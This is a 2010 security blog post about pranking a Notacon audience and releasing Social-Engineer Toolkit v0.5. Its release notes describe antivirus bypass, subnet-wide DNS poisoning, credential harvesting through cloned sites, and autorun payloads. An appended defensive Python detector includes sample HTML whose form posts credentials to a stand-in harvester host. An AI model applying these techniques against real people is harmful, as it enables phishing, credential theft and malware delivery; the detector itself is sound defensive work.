April 17, 2010

Social-Engineering your audience at Notacon

Written by David Kennedy
Security Testing & Analysis Social Engineering
I was sitting at home the night before Notacon, and decided, well, I can go the usual and normal route and just go through my slides, show some wicked cool stuff, and be done with a good talk. Instead, I decided this was a good opportunity to mess with my audience and do something unique. I came up with the idea that, due to legal reasons, I wouldn't be able to talk about SET and would start talking about "Advanced NMAP Syntax", which was really going to be very basic and a horrible presentation. Halfway through, I was planning on saying "oh, you've been SE'd" and gauging the audience. Well, good idea, but still not spectacular and kind of cheesy... A friend called and implanted an idea in my head the day of Notacon, and all of a sudden, the plan was in full force. My coworker Josh Kelley was coming down to Notacon and was my perfect candidate to help out.

The Plan - SE the Audience.

Fifteen minutes before the talk, I called Chris (LoganWHD) from SE.org and told him of my evil plan; at the same time I pretended to be agitated and in a rush to get out. I gave Josh my bag containing my computer and stormed out of Notacon. I ended up hiding down the street from Notacon. Josh called me in a fake panic claiming he couldn't find the PowerPoint and that the only one on the drive was an "Advanced NMAP" presentation. Having no other alternative, and explaining this to the audience, Josh began his presentation talking about NMAP and explaining how useful the -v command is and how important it is within NMAP. I really tried to make the presentation absolutely horrible in every way, shape and form. From the description given, the audience appeared agitated, confused, angry, and trying to figure out a way to escape the presentation without being rude. Ahhh, the perks of social-engineering and common courtesy within human beings, thanks guys :-) With a couple of helpers, Lars and Jamie, I received a call when Josh came to his second slide. I started upstairs to make sure I was ready.

Josh then got to his last slide (which lasted a total of maybe 3-5 minutes) and said this: "Social Engineering is defined as the process of deceiving people into giving away access or confidential information. It could also be defined as getting a bunch of people in the audience at Notacon into thinking this is a NMAP talk :)" As soon as I heard that from outside the door, I came inside and said: "No more “Let's pop a box”, it’s “Let’s SE the audience”." You could see a sigh of relief from the audience, followed by laughter and claps. Overall it seemed to be a pretty successful and fun time with the Notacon audience, and thanks to the audience for taking it so well! Overall the talk went well; I received lots of questions and sheer amazement at this release and the direction of the toolset. I have to say, this was a fun presentation and it was good SEing the entire audience :-) Real special thanks to Josh (Winfang) for getting up there and intentionally presenting horribly and getting people to say WTF for a short period of time :-) We love you buddy. Also thanks to KaosPunk and Nick for arranging the intro and going along with it, thanks guys!

With this release, and to quote the SE.org blog, here are the changes and intros to SET v0.5:

The Social-Engineer Toolkit (SET) has progressed over the months thanks to the suggestions and collaboration with the security community. With this version, I am proud to announce the immediate release of the Social-Engineer Toolkit v0.5. Before getting into the new attack vectors, let’s talk about the improvements from 0.4 to 0.5:

* The ability to utilize the -x flag within Metasploit, which is much better for A/V bypass. SET has a built-in legitimate executable that it backdoors. Running this through VirusTotal showed only 1 A/V company was picking this up, and it was hit and miss.
* Over 35 bug fixes. I spent a large amount of time beta testing and giving it to people who would test it to find issues with it. Thanks to all of the beta testers, your help was awesome.
* Ettercap no longer does the single HREF replacement custom filter method. Instead, it DNS poisons the entire subnet you're on and redirects them back to your malicious site. You can utilize either a single site, for example blahblah.com, or do a “*”, which will do every single site.
* Rehauled the custom web server within Python to now handle POST requests; this will come into play later.
* Added the latest Sun Java zero-day vulnerability into the Metasploit attack vector.
* Added better user-agent handling to impersonate Firefox better when ripping a site.
* Expanded the site templates: instead of the “Java Required” website, there are now pre-defined templates you can use.

If those changes weren’t enough, let's discuss the new vectors available to you in SET v0.5:

Harvesting Credentials: You can now utilize the credential harvester method in conjunction with the website cloning to harvest usernames and passwords. Essentially, SET will first clone a website. You then coax a victim into coming to the site, and it will rewrite the webpage's POST parameters to POST to the local server, which stores them. After that, the victim is redirected back to the original site you cloned.

Reporting Engine: After you're finished owning the target through SET’s attack vectors, an HTML-based report as well as an XML export will be generated with all of the parameters it was able to harvest. This attack vector alone is a great addition to the toolkit, and allows the ability to do something other than complete pwnage.

Custom HakSaw – The SET way: The next addition allows you to create an infectious USB/DVD/CD with a simple autorun.inf. This attack is pretty simple but will get more advanced as we go down the road. Essentially, a folder is created which you can burn to a DVD/CD, and when it is inserted into a machine with autorun enabled, it will execute a Metasploit payload for you.

SET has taken on a life of its own. Even though there are countless hours into perfecting this tool, I want to thank all the people who have helped with ideas, vectors, code and testing. We are all very excited about this release and the new capabilities it brings to the toolkit. If you have any questions, new feature ideas, or bugs, always feel free to report them to: [email protected].
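The credential harvester described above works by cloning a login page and rewriting its form so the submission is POSTed to the harvester's own server before the victim is bounced back to the real site. From the defender's side, the visible artifact of that rewrite is a form whose action resolves to a different host than the page the browser believes it is on. The check below, an added example that is not SET's code and not part of the original post, parses a served page with the standard library and reports every form whose action host differs from the page host. The URLs, the sample HTML and the 198.51.100.7 collector address are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormActionCollector(HTMLParser):
    """Collect (method, action) for every <form> element on the page."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "form":
            return
        a = dict(attrs)
        # HTML defaults: method GET, empty action means "post to this page"
        method = (a.get("method") or "get").lower()
        action = a.get("action") or ""
        self.forms.append((method, action))


def foreign_post_targets(page_url, html):
    """Return [(method, resolved_action)] for forms whose action resolves
    to a host other than the host of page_url.

    A cloned login page whose form has been rewritten to POST to a
    harvester shows up here; a legitimate page posting to itself (or to
    a relative path) does not.
    """
    parser = FormActionCollector()
    parser.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    hits = []
    for method, action in parser.forms:
        resolved = urljoin(page_url, action)  # resolve relative actions
        host = (urlparse(resolved).hostname or "").lower()
        if host != page_host:
            hits.append((method, resolved))
    return hits


# --- constructed sample input -------------------------------------------
LEGIT_URL = "https://login.example.com/"

# The real page: form posts back to its own origin via a relative path.
LEGIT_HTML = """
<html><body>
<form method="post" action="/session">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>
"""

# A clone of the same page with the action rewritten to the harvester.
CLONED_HTML = """
<html><body>
<form method="post" action="http://198.51.100.7/post.php">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    print("legit :", foreign_post_targets(LEGIT_URL, LEGIT_HTML))
    print("cloned:", foreign_post_targets(LEGIT_URL, CLONED_HTML))
```

Treat a hit as a triage signal rather than a verdict: some legitimate sites post credentials to a separate SSO host, so pair this check with an allowlist of known authentication endpoints. Conversely a clone served under the real hostname (as with the DNS poisoning vector above) can only be caught by this check if the form action itself was rewritten to a foreign host, which is exactly what the harvester does.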